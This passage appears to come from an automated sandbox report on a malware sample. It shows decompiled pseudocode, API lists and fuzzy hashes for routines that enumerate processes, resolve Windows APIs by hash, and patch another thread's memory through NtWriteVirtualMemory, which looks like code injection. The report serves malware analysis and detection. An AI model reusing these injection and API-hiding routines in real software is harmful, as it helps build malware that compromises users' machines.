					_t35 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E100085FB(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}






















                                                                                                                                                                                                0x1000cbc5
                                                                                                                                                                                                0x1000cbc7
                                                                                                                                                                                                0x1000cbc9
                                                                                                                                                                                                0x1000cbd2
                                                                                                                                                                                                0x1000cbdd
                                                                                                                                                                                                0x1000cbe2
                                                                                                                                                                                                0x1000cbe6
                                                                                                                                                                                                0x1000cbfa
                                                                                                                                                                                                0x1000cc02
                                                                                                                                                                                                0x1000cc23
                                                                                                                                                                                                0x1000cc29
                                                                                                                                                                                                0x1000cc31
                                                                                                                                                                                                0x1000cc3f
                                                                                                                                                                                                0x1000cc45
                                                                                                                                                                                                0x1000cc46
                                                                                                                                                                                                0x1000cc52
                                                                                                                                                                                                0x1000cc59
                                                                                                                                                                                                0x1000cc69
                                                                                                                                                                                                0x1000cca9
                                                                                                                                                                                                0x1000cca9
                                                                                                                                                                                                0x1000cc88
                                                                                                                                                                                                0x1000cc88
                                                                                                                                                                                                0x1000cca7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000cca7
                                                                                                                                                                                                0x1000cc69
                                                                                                                                                                                                0x1000cc23
                                                                                                                                                                                                0x1000cbe6
                                                                                                                                                                                                0x1000ccab
                                                                                                                                                                                                0x1000ccb2
                                                                                                                                                                                                0x1000ccb5
                                                                                                                                                                                                0x1000ccbb
                                                                                                                                                                                                0x1000ccbb
                                                                                                                                                                                                0x1000ccc2
                                                                                                                                                                                                0x1000ccc9
                                                                                                                                                                                                0x1000cccc
                                                                                                                                                                                                0x1000ccd1
                                                                                                                                                                                                0x1000ccde
                                                                                                                                                                                                0x1000cce4
                                                                                                                                                                                                0x1000cceb

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000C510: LoadLibraryW.KERNEL32 ref: 1000C608
                                                                                                                                                                                                  • Part of subcall function 1000C510: memset.MSVCRT ref: 1000C647
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CCB5
                                                                                                                                                                                                  • Part of subcall function 1000C702: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CCD), ref: 1000C775
                                                                                                                                                                                                  • Part of subcall function 1000C702: RegisterClassExA.USER32(00000030), ref: 1000C7C7
                                                                                                                                                                                                  • Part of subcall function 1000C702: CreateWindowExA.USER32 ref: 1000C7F2
                                                                                                                                                                                                  • Part of subcall function 1000C702: DestroyWindow.USER32(00000000), ref: 1000C7FD
                                                                                                                                                                                                  • Part of subcall function 1000C702: UnregisterClassA.USER32 ref: 1000C808
                                                                                                                                                                                                • memset.MSVCRT ref: 1000CBFA
                                                                                                                                                                                                • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CC1B
                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC64
                                                                                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC81
                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CCA2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 850789531-0
                                                                                                                                                                                                • Opcode ID: 9eab91cf71bffb947258017bf067e6f8b047ae0e76e601099a3b8dfafea9ea2a
                                                                                                                                                                                                • Instruction ID: b74b7ad64cb86760f2f547b1f56bdb80a1078b1eafb2e764bbaace3cce1a3b62
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eab91cf71bffb947258017bf067e6f8b047ae0e76e601099a3b8dfafea9ea2a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C314B76A00219AFFB01CFA8CD89FDEB7B8EF08394F104165E505D62A4E730EE448B91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000ABE5, Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000ABE5(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CD02(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x4d2f878
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x4d2f878
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}













                                                                                                                                                                                                0x1000abe5
                                                                                                                                                                                                0x1000abfd
                                                                                                                                                                                                0x1000abff
                                                                                                                                                                                                0x1000ac02
                                                                                                                                                                                                0x1000ac04
                                                                                                                                                                                                0x1000ac09
                                                                                                                                                                                                0x1000ac18
                                                                                                                                                                                                0x1000ac20
                                                                                                                                                                                                0x1000ac34
                                                                                                                                                                                                0x1000ac44
                                                                                                                                                                                                0x1000ac4a
                                                                                                                                                                                                0x1000ac4f
                                                                                                                                                                                                0x1000ac55
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ac57
                                                                                                                                                                                                0x1000ac68
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ac68
                                                                                                                                                                                                0x1000ac70
                                                                                                                                                                                                0x1000ac77
                                                                                                                                                                                                0x1000ac36
                                                                                                                                                                                                0x1000ac36
                                                                                                                                                                                                0x1000ac3c
                                                                                                                                                                                                0x1000ac41
                                                                                                                                                                                                0x1000ac41
                                                                                                                                                                                                0x1000ac34
                                                                                                                                                                                                0x1000ac80

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABFF
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AC18
                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 1000AC2F
                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 1000AC63
                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 1000AC70
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1267121359-0
                                                                                                                                                                                                • Opcode ID: 0aa293739a954841e9fd1fe14ce378430b4240327dca0120948fa1dd664b7ec6
                                                                                                                                                                                                • Instruction ID: 013a5f736d5b7b9acb904e4d8031e299c78d360c791acb72ef8c4c0d1b8f3efb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aa293739a954841e9fd1fe14ce378430b4240327dca0120948fa1dd664b7ec6
                                                                                                                                                                                                • Instruction Fuzzy Hash: D011C1722043516BE310DB68CC89F9F37ECEB893E0F120629F520CB181EB30D8008766
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000DFEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000DFEF(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                                0x1000dff8
                                                                                                                                                                                                0x1000dffa
                                                                                                                                                                                                0x1000dffd
                                                                                                                                                                                                0x1000e000
                                                                                                                                                                                                0x1000e006
                                                                                                                                                                                                0x1000e063
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e063
                                                                                                                                                                                                0x1000e008
                                                                                                                                                                                                0x1000e013
                                                                                                                                                                                                0x1000e016
                                                                                                                                                                                                0x1000e01b
                                                                                                                                                                                                0x1000e020
                                                                                                                                                                                                0x1000e023
                                                                                                                                                                                                0x1000e025
                                                                                                                                                                                                0x1000e028
                                                                                                                                                                                                0x1000e02b
                                                                                                                                                                                                0x1000e030
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e032
                                                                                                                                                                                                0x1000e032
                                                                                                                                                                                                0x1000e044
                                                                                                                                                                                                0x1000e051
                                                                                                                                                                                                0x1000e055
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e057
                                                                                                                                                                                                0x1000e05a
                                                                                                                                                                                                0x1000e05b
                                                                                                                                                                                                0x1000e061
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e061
                                                                                                                                                                                                0x1000e078
                                                                                                                                                                                                0x1000e07d
                                                                                                                                                                                                0x1000e081
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e08d
                                                                                                                                                                                                0x1000e08d
                                                                                                                                                                                                0x1000e08f
                                                                                                                                                                                                0x1000e08f
                                                                                                                                                                                                0x1000e095
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e09b
                                                                                                                                                                                                0x1000e09f
                                                                                                                                                                                                0x1000e0a3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e0a3
                                                                                                                                                                                                0x1000e0a9
                                                                                                                                                                                                0x1000e0b1
                                                                                                                                                                                                0x1000e0b6
                                                                                                                                                                                                0x1000e0b9
                                                                                                                                                                                                0x1000e0b9
                                                                                                                                                                                                0x1000e0bb
                                                                                                                                                                                                0x1000e0bf
                                                                                                                                                                                                0x1000e0c7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e0cb
                                                                                                                                                                                                0x1000e0d3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000e0d3

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(.dll,1000604E,0000011C,00000000), ref: 1000E0BF
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E0CB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                                • API String ID: 2574300362-2738580789
                                                                                                                                                                                                • Opcode ID: 54313e2ad0f9216a25889339fdb8d5bfede618fbf4471c27fd8460f88c62a8b8
                                                                                                                                                                                                • Instruction ID: 2b010cf349d1f56d5a7d2dbb0e1c5a40c32b3674a8f2f7ce5b3a03b67c5868ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54313e2ad0f9216a25889339fdb8d5bfede618fbf4471c27fd8460f88c62a8b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE31E131A002998BEB54CFA9C8C0BAEBBF5EF44384F244469D805E7349DBB0DD91CB90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1003FCF0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 176memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(1007958C,0000504A,@&JP,?), ref: 1003FEB9
                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000680,1006AAF8), ref: 1003FF5B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389031697.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PathProtectTempVirtual
                                                                                                                                                                                                • String ID: &JP$&JP$@&JP$JP
                                                                                                                                                                                                • API String ID: 3422257996-101263471
                                                                                                                                                                                                • Opcode ID: 6af33f0a8db61a6b0f94e8de214087de556935fe5d6c66ba85c079bf9a38abc5
                                                                                                                                                                                                • Instruction ID: 12c374ae936a352f8aa530e33edcbf826ee8ce32f596dbea76b5d1032cef70ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6af33f0a8db61a6b0f94e8de214087de556935fe5d6c66ba85c079bf9a38abc5
                                                                                                                                                                                                • Instruction Fuzzy Hash: A79160719041A5DFEB04CF69C9D08EC7BBBEB4870AB05C16AD44497B65D3FA5A44CF40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100049FE, Relevance: 9.3, APIs: 6, Instructions: 285stringmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E100049FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x4cb04a0
					_t3 = _t123 + 0x110; // 0x4d2fb70
					_t125 =  *0x1001e68c; // 0x4d2fa40
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *_t3)));
				}
				if(E1000BBCF(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7EA(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B6BF(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049BA( &_v1076,  &_v1076, _t206);
					_t141 = E1000D442( &_v1076, E1000C3BB( &_v1076), 0);
					E1000B8CC(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C82(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092C6(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x4cb04a0
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091C4(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091C4(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9c6);
								E10009F13(0xe);
								E10009F37(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A076(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3D8(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3D8(_t188, _t180, _t208);
								}
								_t87 = E100097ED(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A076(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x4cb04a0
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC57(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x4cb04a0
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E280(_t183);
										}
										E100052B3( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x4cb04a0
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												HeapCreate(_t190, _t130, ??); // executed
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085B6( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x4cb06c8
									_t153 = _t51;
									L25:
									_t90 = E10005532(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x4cb04a0
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C2D4(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x4d2f878
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x4d2f878
								 *((intOrPtr*)(_t109 + 0x30))();
								E100085FB( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E100085FB( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t17 = _t75 + 0x1898; // 0x0
						_t116 =  *_t17;
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E2C8(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095C2(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000C02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085B6( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002B97( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































                                                                                                                                                                                                0x100049fe
                                                                                                                                                                                                0x10004a0b
                                                                                                                                                                                                0x10004a16
                                                                                                                                                                                                0x10004a1b
                                                                                                                                                                                                0x10004a1d
                                                                                                                                                                                                0x10004a20
                                                                                                                                                                                                0x10004a25
                                                                                                                                                                                                0x10004a28
                                                                                                                                                                                                0x10004a32
                                                                                                                                                                                                0x10004a34
                                                                                                                                                                                                0x10004a39
                                                                                                                                                                                                0x10004a41
                                                                                                                                                                                                0x10004a4a
                                                                                                                                                                                                0x10004a4a
                                                                                                                                                                                                0x10004a57
                                                                                                                                                                                                0x10004a72
                                                                                                                                                                                                0x10004a79
                                                                                                                                                                                                0x10004a7b
                                                                                                                                                                                                0x10004a80
                                                                                                                                                                                                0x10004a85
                                                                                                                                                                                                0x10004a8b
                                                                                                                                                                                                0x10004a9a
                                                                                                                                                                                                0x10004ab9
                                                                                                                                                                                                0x10004abb
                                                                                                                                                                                                0x10004ac1
                                                                                                                                                                                                0x10004ac7
                                                                                                                                                                                                0x10004acc
                                                                                                                                                                                                0x10004ad0
                                                                                                                                                                                                0x10004ad3
                                                                                                                                                                                                0x10004add
                                                                                                                                                                                                0x10004adf
                                                                                                                                                                                                0x10004ae0
                                                                                                                                                                                                0x10004aeb
                                                                                                                                                                                                0x10004aed
                                                                                                                                                                                                0x10004af0
                                                                                                                                                                                                0x10004af5
                                                                                                                                                                                                0x10004afc
                                                                                                                                                                                                0x10004b51
                                                                                                                                                                                                0x10004b51
                                                                                                                                                                                                0x10004b56
                                                                                                                                                                                                0x10004bbd
                                                                                                                                                                                                0x10004bc2
                                                                                                                                                                                                0x10004bc4
                                                                                                                                                                                                0x10004bce
                                                                                                                                                                                                0x10004bd3
                                                                                                                                                                                                0x10004bd3
                                                                                                                                                                                                0x10004bed
                                                                                                                                                                                                0x10004bef
                                                                                                                                                                                                0x10004bf2
                                                                                                                                                                                                0x10004bf4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004bfa
                                                                                                                                                                                                0x10004c04
                                                                                                                                                                                                0x10004c0d
                                                                                                                                                                                                0x10004c12
                                                                                                                                                                                                0x10004c15
                                                                                                                                                                                                0x10004c1b
                                                                                                                                                                                                0x10004c21
                                                                                                                                                                                                0x10004c29
                                                                                                                                                                                                0x10004c2b
                                                                                                                                                                                                0x10004c2e
                                                                                                                                                                                                0x10004c2f
                                                                                                                                                                                                0x10004c34
                                                                                                                                                                                                0x10004c37
                                                                                                                                                                                                0x10004c3a
                                                                                                                                                                                                0x10004c3c
                                                                                                                                                                                                0x10004c40
                                                                                                                                                                                                0x10004c40
                                                                                                                                                                                                0x10004c45
                                                                                                                                                                                                0x10004c48
                                                                                                                                                                                                0x10004c4a
                                                                                                                                                                                                0x10004c4e
                                                                                                                                                                                                0x10004c4e
                                                                                                                                                                                                0x10004c55
                                                                                                                                                                                                0x10004c5a
                                                                                                                                                                                                0x10004c5c
                                                                                                                                                                                                0x10004c60
                                                                                                                                                                                                0x10004c62
                                                                                                                                                                                                0x10004c68
                                                                                                                                                                                                0x10004c6c
                                                                                                                                                                                                0x10004c6f
                                                                                                                                                                                                0x10004c70
                                                                                                                                                                                                0x10004c75
                                                                                                                                                                                                0x10004c78
                                                                                                                                                                                                0x10004c7d
                                                                                                                                                                                                0x10004ca5
                                                                                                                                                                                                0x10004cab
                                                                                                                                                                                                0x10004cb2
                                                                                                                                                                                                0x10004cc1
                                                                                                                                                                                                0x10004cc6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004cc6
                                                                                                                                                                                                0x10004cb4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004c7f
                                                                                                                                                                                                0x10004c7f
                                                                                                                                                                                                0x10004c84
                                                                                                                                                                                                0x10004c8b
                                                                                                                                                                                                0x10004cd0
                                                                                                                                                                                                0x10004cd0
                                                                                                                                                                                                0x10004cd7
                                                                                                                                                                                                0x10004cdb
                                                                                                                                                                                                0x10004cdc
                                                                                                                                                                                                0x10004cdc
                                                                                                                                                                                                0x10004ce6
                                                                                                                                                                                                0x10004ceb
                                                                                                                                                                                                0x10004cee
                                                                                                                                                                                                0x10004cef
                                                                                                                                                                                                0x10004cf1
